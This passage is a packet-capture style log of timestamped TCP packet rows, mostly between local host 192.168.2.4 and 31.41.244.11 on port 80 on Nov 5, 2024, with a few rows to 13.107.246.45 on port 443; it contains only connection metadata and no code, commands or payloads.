Nov 5, 2024 18:46:10.698602915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698632002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698693037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698715925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698726892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698736906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698749065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698757887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698759079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698769093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698779106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698787928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698796988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698805094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698815107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698816061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698832035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698857069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698956013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698966980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698975086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699002028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699019909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699026108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699029922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699045897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699062109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699086905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699142933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699153900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699163914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699173927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699184895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699187994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699204922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699209929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699217081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699229002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699239969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699248075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699250937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699261904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699265957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699275970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699280977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699286938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699297905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699306965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699316025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699345112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699369907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699381113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699390888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699413061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699433088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699460983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699470997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699480057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699495077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699505091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699513912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699517012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699522972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699554920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699558020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699598074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699606895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699616909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699640036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699659109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699678898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699688911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699698925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699711084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699722052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.699722052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699745893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.699778080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700000048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700018883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700027943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700058937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700095892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700108051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700118065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700129032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700139999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700150967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700160980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700169086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700179100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700213909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700254917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700267076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700278997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700289011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700289011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700299025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700304985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700331926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700360060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700368881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700378895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700401068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700418949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.700424910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.700455904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.701838017 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.703236103 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.703250885 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.703735113 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.703741074 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.739562035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.739573956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.739579916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.739715099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.782113075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.782124043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.782135963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.782322884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788563013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788572073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788583040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788633108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788655043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788762093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788773060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788783073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788799047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788810015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788809061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788820982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788831949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788832903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788842916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788846016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788853884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.788877010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.788903952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789052010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789062023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789072037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789086103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789110899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789721966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789772987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789793015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789803028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789829969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789849043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789849997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789859056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789870024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789901972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789921045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789921999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789932013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789942026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789959908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789977074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789988041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.789988041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.789998055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790010929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790024042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790031910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790041924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790041924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790080070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790118933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790129900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790139914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790165901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790177107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790272951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790283918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790293932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790303946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790313959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790344954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790371895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790381908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790390968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790400028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790409088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790411949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790419102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790429115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790431976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790450096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790472984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790501118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790544987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790558100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790568113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790601969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790641069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790652037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790661097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790671110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790687084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790695906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790704012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790709972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790720940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790747881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790766954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790899992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790910006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790920973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790945053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790952921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.790972948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.790993929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791131973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791141987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791152000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791172981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791199923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791224957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791237116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791246891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791273117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791290045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791446924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791484118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791491032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.791500092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.791537046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.800988913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801008940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801018953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801040888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801064014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801146984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801156998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801168919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801189899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801213980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801218033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801227093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801275015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801291943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801302910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801321983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801331997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801342010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801351070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801352978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801358938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801378965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801407099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801434994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801445961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801460028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801471949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801484108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801496983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801517963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801584005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801594019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801604986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801614046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801625013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801629066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801635981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801662922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801667929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801675081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801695108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801717997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801724911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801737070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801747084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801764965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801780939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.801918030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801929951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801944017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.801964045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802005053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802141905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802154064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802165985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802186966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802211046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802218914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802262068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802274942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802285910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802325010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802342892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802355051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802366018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802378893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802390099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802408934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802505016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802515984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802527905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802539110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802551031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802553892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802562952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802573919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802575111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802584887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802596092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802599907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802611113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802617073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802642107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802654982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802654982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802668095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802706003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802706003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802730083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802741051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802751064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802762032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802772045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802788019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802807093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802834034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802851915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802870989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802874088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802887917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802891970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802905083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802913904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802923918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802952051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.802973986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802985907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.802997112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803014040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803028107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803030014 CET	49804	80	192.168.2.4	31.41.244.11
